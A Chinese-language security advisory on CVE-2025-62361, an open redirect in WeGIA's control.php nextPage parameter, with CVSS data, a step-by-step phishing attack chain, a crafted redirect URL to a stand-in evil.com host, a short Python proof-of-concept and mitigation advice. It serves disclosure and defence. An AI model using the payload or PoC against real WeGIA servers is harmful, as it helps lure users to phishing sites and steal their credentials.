CVE-2025-62361：WeGIA管理平台Open Redirect开放重定向漏洞

漏洞信息

漏洞编号

CVE-2025-62361

漏洞类型

开放重定向（Open Redirect）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WeGIA（开源Web机构管理系统）

漏洞概述

CVE-2025-62361是WeGIA开源Web机构管理系统中存在的一个开放重定向（Open Redirect）漏洞。WeGIA是一款主要面向葡萄牙语用户的开源Web管理平台，广泛用于各类机构的信息化管理。该漏洞存在于WeGIA的control.php端点中，具体位于处理AlmoxarifeControle（库存管理员控制器）类请求的nextPage参数处。在3.5.0版本之前，该参数未对用户输入的URL进行充分的验证和过滤，导致攻击者可以构造恶意的重定向URL，将用户重定向至任意外部域名。

由于WeGIA作为一个受信的机构管理平台，其域名在用户心中具有一定的可信度，攻击者可以利用此漏洞进行钓鱼攻击，将合法用户诱导至恶意网站，进而实施凭证窃取、恶意软件分发或其他社会工程学攻击。该漏洞的CVSS 3.1评分为6.1分，属于中危级别。虽然漏洞本身不直接造成数据泄露或系统入侵，但其作为钓鱼攻击的辅助手段，具有较高的实际危害性。漏洞的范围（Scope）标记为Changed，意味着漏洞的影响超出了受影响的组件本身。该漏洞已在WeGIA 3.5.0版本中修复，建议相关用户尽快升级。

技术细节

该漏洞位于WeGIA的control.php端点中，具体的调用方式为通过metodo=listarTodos参数调用AlmoxarifeControle控制器类。在该控制器的处理逻辑中，存在一个nextPage参数用于指定操作完成后的跳转目标页面。然而，开发者在实现该功能时，未对nextPage参数的值进行严格的URL验证和过滤。

攻击原理如下：
1. 攻击者构造一个包含恶意nextPage参数的URL，例如将nextPage的值设置为外部恶意网站的URL（如http://evil.com/phishing）；
2. 攻击者通过钓鱼邮件、即时消息或其他社交工程手段诱导受害者点击该链接；
3. 受害者点击链接后，请求被发送至WeGIA服务器的control.php端点；
4. 服务器处理完listarTodos方法后，使用nextPage参数的值进行重定向；
5. 用户的浏览器被重定向至攻击者控制的恶意网站。

由于WeGIA的域名是受信的，用户在浏览器地址栏中看到的是合法的WeGIA域名，降低了用户的警惕性。攻击者可以利用此机制进行凭证窃取（伪造登录页面）、恶意软件分发（诱导下载恶意软件）或进一步的社会工程学攻击。修复方案是对nextPage参数进行严格的输入验证，确保重定向目标仅限内部路径或经过白名单验证的URL。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标组织使用的WeGIA版本（低于3.5.0），确认control.php端点存在开放重定向漏洞。

STEP 2

步骤2：构造恶意URL

攻击者构造包含恶意nextPage参数的URL，将重定向目标设置为攻击者控制的钓鱼网站，例如：https://target/control.php?metodo=listarTodos&nomeClasse=AlmoxarifeControle&nextPage=https://evil.com/phishing

STEP 3

步骤3：社工诱导

攻击者通过钓鱼邮件、即时消息或社交媒体等方式，将恶意URL发送给目标用户，利用WeGIA受信域名的伪装性降低用户警惕。

STEP 4

步骤4：触发重定向

受害者点击链接后，请求被发送至WeGIA服务器，服务器处理listarTodos方法后，根据nextPage参数将用户重定向至恶意网站。

STEP 5

步骤5：实施攻击

用户在恶意网站上被诱导输入凭证、下载恶意软件或执行其他危险操作，攻击者完成凭证窃取或系统入侵。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-62361 - WeGIA Open Redirect PoC
# Vulnerability: Open Redirect via nextPage parameter in control.php
# Affected endpoint: control.php?metodo=listarTodos&nomeClasse=AlmoxarifeControle
# Fixed in: WeGIA 3.5.0

import requests

TARGET_URL = "http://target-wegia-server/control.php"
MALICIOUS_REDIRECT = "https://evil-phishing-site.com/fake-login"

# Step 1: Craft the malicious URL with the Open Redirect payload
payload_params = {
    "metodo": "listarTodos",
    "nomeClasse": "AlmoxarifeControle",
    "nextPage": MALICIOUS_REDIRECT  # Unvalidated redirect target
}

# Step 2: Send the request (in a real attack, victim would click a crafted link)
response = requests.get(TARGET_URL, params=payload_params, allow_redirects=False)

# Step 3: Check if the server returns a redirect to the malicious site
if response.status_code in (301, 302, 303, 307, 308):
    location = response.headers.get("Location", "")
    print(f"[+] Redirect detected to: {location}")
    if MALICIOUS_REDIRECT in location:
        print("[!] VULNERABLE: Open Redirect confirmed!")
    else:
        print("[-] Not vulnerable or redirect target filtered.")
else:
    print(f"[-] No redirect. Status code: {response.status_code}")

# Example crafted malicious URL:
# http://target-wegia-server/control.php?metodo=listarTodos&nomeClasse=AlmoxarifeControle&nextPage=https://evil-phishing-site.com/fake-login

影响范围

WeGIA < 3.5.0

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）在Web服务器或反向代理层面添加重定向规则，过滤包含外部域名的Location响应头；2）通过WAF规则阻断包含可疑nextPage参数的请求；3）监控异常的重定向行为，特别是指向外部域名的重定向；4）提高用户安全意识培训，警惕来自受信域名的可疑链接；5）尽快升级至WeGIA 3.5.0或更高版本以彻底修复该漏洞。